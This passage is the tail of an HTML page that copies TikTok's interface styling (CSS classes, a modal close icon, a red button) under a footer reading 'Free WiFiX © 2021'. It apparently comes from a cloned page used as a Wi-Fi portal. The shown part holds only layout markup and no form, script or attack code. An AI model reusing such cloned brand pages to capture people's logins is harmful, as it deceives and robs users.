         .tiktok-1hv3rn9-DivIcon{height:64px;width:64px;border-radius:50%;position:relative;background:rgba(22, 24, 35, .03);display:inline-block;}.tiktok-1hv3rn9-DivIcon::before,.tiktok-1hv3rn9-DivIcon::after{width:5px;height:23px;display:block;content:"";background:#fe3824;position:absolute;left:50%;-webkit-transform:translate(-50%, 16px);-moz-transform:translate(-50%, 16px);-ms-transform:translate(-50%, 16px);transform:translate(-50%, 16px);}.tiktok-1hv3rn9-DivIcon::after{height:5px;-webkit-transform:translate(-50%, 43px);-moz-transform:translate(-50%, 43px);-ms-transform:translate(-50%, 43px);transform:translate(-50%, 43px);}
        </style>
        <div class="tiktok-1hv3rn9-DivIcon e1pdjumk1">
        </div>
        <style data-emotion="tiktok 1li09rv-IClose">
         .tiktok-1li09rv-IClose{right:16px;position:absolute;top:16px;cursor:pointer;}
        </style>
        <i class="tiktok-1li09rv-IClose e1pdjumk2" data-e2e="instagram-modal-close">
         <svg fill="currentColor" height="1em" viewbox="0 0 48 48" width="1em" xmlns="http://www.w3.org/2000/svg">
          <path clip-rule="evenodd" d="M21.1718 23.9999L10.2931 13.1212C9.90261 12.7307 9.90261 12.0975 10.2931 11.707L11.7074 10.2928C12.0979 9.90228 12.731 9.90228 13.1216 10.2928L24.0002 21.1715L34.8789 10.2928C35.2694 9.90228 35.9026 9.90228 36.2931 10.2928L37.7073 11.707C38.0979 12.0975 38.0979 12.7307 37.7073 13.1212L26.8287 23.9999L37.7073 34.8786C38.0979 35.2691 38.0979 35.9023 37.7073 36.2928L36.2931 37.707C35.9026 38.0975 35.2694 38.0975 34.8789 37.707L24.0002 26.8283L13.1216 37.707C12.731 38.0975 12.0979 38.0975 11.7074 37.707L10.2931 36.2928C9.90261 35.9023 9.90261 35.2691 10.2931 34.8786L21.1718 23.9999Z" fill-rule="evenodd">
          </path>
         </svg>
        </i>
        <style data-emotion="tiktok o4npi8-PDesc">
         .tiktok-o4npi8-PDesc{color:rgba(22, 24, 35, 1.0);font-family:ProximaNova,Arial,Tahoma,PingFangSC,sans-serif;line-height:20px;font-size:17px;margin:24px 0;text-align:center;}
        </style>
        <style data-emotion="tiktok 2ugvhe-StyledButton">
         .tiktok-2ugvhe-StyledButton{width:100%;margin-top:32px;}
        </style>
        <style data-emotion="tiktok 1sa4xll-Button-StyledButton">
         .tiktok-1sa4xll-Button-StyledButton{border-radius:4px;border:none;color:rgba(255, 255, 255, 1.0);background-color:rgba(254, 44, 85, 1.0);min-width:120px;min-height:46px;font-size:16px;line-height:22px;font-weight:700;font-family:ProximaNova,PingFangSC,sans-serif;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;position:relative;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;-webkit-justify-content:center;justify-content:center;padding:6px 8px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;cursor:pointer;box-sizing:border-box;width:100%;margin-top:32px;}.tiktok-1sa4xll-Button-StyledButton:hover{background:linear-gradient(0deg, rgba(0, 0, 0, 0.06), rgba(0, 0, 0, 0.06)),#FE2C55;}.tiktok-1sa4xll-Button-StyledButton:active{background:linear-gradient(0deg, rgba(0, 0, 0, 0.12), rgba(0, 0, 0, 0.12)),#FE2C55;}.tiktok-1sa4xll-Button-StyledButton:disabled{border:none;color:rgba(22, 24, 35, 0.34);background-color:rgba(22, 24, 35, 0.06);pointer-events:none;}.tiktok-1sa4xll-Button-StyledButton:focus{outline:none;}
        </style>
       </div>
      </div>
     </div>
    </div>
    <style data-emotion="tiktok h63wdf-DivContainer">
     .tiktok-h63wdf-DivContainer{color:rgba(22, 24, 35, 1.0);font-family:ProximaNova,Arial,Tahoma,PingFangSC,sans-serif;height:64px;border-top:none;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-ms-flex-pack:center;-webkit-justify-content:center;justify-content:center;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;font-size:15px;line-height:18px;}
    </style>
    <div class="tiktok-h63wdf-DivContainer e1b6crsh0" style="height:58px;background:rgba(22, 24, 35, 0.03)">
     <div data-e2e="bottom-text">
      Free WiFiX &copy; 2021
     </div>
     <style data-emotion="tiktok 1f8xcgp-ALink">
      .tiktok-1f8xcgp-ALink{color:rgba(254, 44, 85, 1.0);font-weight:600;font-size:12px;}.tiktok-1f8xcgp-ALink:hover,.tiktok-1f8xcgp-ALink:focus{-webkit-text-decoration:underline;text-decoration:underline;text-decoration-color:rgba(254, 44, 85, 1.0);}
     </style>
    </div>
   </div>
  </div>
</body>
</html>
